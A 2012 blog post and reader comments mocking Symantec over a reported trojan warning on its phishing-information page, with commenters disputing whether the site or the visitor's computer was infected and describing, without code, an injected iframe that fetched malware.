Trojan virus found on Symantec. Symantec needs to clean it’s own site
Posted on | June 16, 2012 | 4 Comments
Mike 4:21 AM (1 hour ago)
LOL !!!! You are going to love this. I went to Symantec’s (Nortons) site to see how they determined what sites are “fraudulent”.There is nothing on there where you can submit a site, so they must put the sites in themselves. Now while on their site, they had a section on “phishing” ( fraudulent sites). So, I clicked on the link to see what they had to say about it. Guess what ? I got a VIRUS WARNING ( see attached ). So Symantec- the self described leader of Internet Security and the one that falsely claims your site is fraudulent – has on their own site a page infected with the HTML Bayfraud Trojan. This Trojan uses spoofing technology ( phishing -a fraudulant website ), and appears to be an HTML page. It is designed to steal confidential information from eBay users. So it seems Symantec is hosting a fraudulent site.
Comments
4 Responses to “Trojan virus found on Symantec. Symantec needs to clean it’s own site”
Leave a Reply
June 16th, 2012 @ 2:18 pm
The poster doesn’t know what they are talking about. The cited trojan is a windows executable, and can be ran on a sun-java webserver. This means that the individual’s computer is infected, not Symantec.
June 16th, 2012 @ 2:18 pm
Correction, “Can’t” verses “can”.
June 17th, 2012 @ 6:53 pm
No, the poster is correct. It is a Windows executable, that is hosted on the Symantec site. It is activated by a PHP script – on the Symantec site – to download the trojan to the users computer. The Symantec site is infected- not the users computer. I went to the section myself and my antivirus is blocking Symantec from downloading the virus TO my computer
June 17th, 2012 @ 8:53 pm
Let me be a little more explicit on the above. When you went to the site, there are 2 options of the page being loaded – a regular HTML page and a gzipped HTML page. Depending on your browser, one of these two is loaded. It is the gzipped version that is flagged as being infected.
On a separate computer I use for these purposes (after I am done the drive is wiped and I am starting over with a clean system ) I loaded the gzipped page. I then looked at the source code. There was an encoded iframe line that executed a PHP script that connected to another site that downloaded the trojan. Now I just rechecked the page a few minutes ago. Guess what ? The iframe is gone. They must read Orlys bog 🙂
I don’t think the original poster was implying that their site was infected and at risk. I think he was pointing out the irony of the situation. If you have followed the reports of Google claiming Orlys site was infected, it was the same thing. Orly never had an infection on her site, it was an iframe that was put in on the page ( that connected to the other site ) after the site was hacked.